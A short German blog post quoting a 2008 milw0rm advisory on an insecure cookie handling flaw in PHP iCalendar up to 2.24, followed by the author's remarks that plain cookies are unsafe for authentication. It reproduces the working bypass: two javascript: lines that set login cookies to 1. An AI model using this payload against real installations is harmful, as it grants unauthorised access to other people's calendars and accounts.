trafex

Heute habe ich bei milw0rm.com folgenden Fehler im Script “PHP iCalendar” gefunden:

####################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";

# milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526

Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten mindestens eine Art von Session-System, mit dem man eine Nutzerauthentifizerung auf einfache Art und Weise implementieren kann und an allen Stellen wird darauf hingewiesen das Cookies unsicher sind. Um so schlimmer ist es auch noch das solche Scripte öffentlich angeboten werden. Ein Grund mehr nicht jedem Script, welches angeboten wird, zu vertrauen.